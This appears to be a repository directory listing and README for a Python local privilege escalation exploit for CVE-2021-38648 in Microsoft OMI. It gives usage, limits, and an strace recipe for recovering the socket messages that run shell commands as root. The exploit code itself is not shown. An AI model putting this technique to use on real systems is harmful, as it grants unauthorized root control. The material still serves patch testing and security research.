278d940fee
|
||
|---|---|---|
| .. | ||
| README.md | ||
| cve_2021_38648.py | ||
README.md
CVE-2021-38648 Microsoft OMI Management Interface Authentication Bypass
This is an LPE exploit for CVE-2021-38648
Usage
usage: cve_2021_38648.py [-h] [-s SOCKET_PATH] [--timeout TIMEOUT] command
positional arguments:
command the command to run
optional arguments:
-h, --help show this help message and exit
-s SOCKET_PATH, --socket SOCKET_PATH
socket file
--timeout TIMEOUT response timeout
The exploit will exit with a status of 0 on success. The command is limited to 256 characters in length due to the
hardcoded messages that are exchanged. To increase this, generate a new series of messages using the strace command
below, search for the second writev syscall and extract each iovec instance. There should be six in total, and the
first 4 bytes of each should be consistent.
The hardcoded messages were recovered using:
strace -v -s 5000 -f -xx -e trace=socket,connect,write,writev,close \
/opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command '...' timeout 0 }
It is important that the exploit wait on the socket for a response to be received. It doesn't need to be read, but the socket needs to be kept open until either the server closes it or the response is received.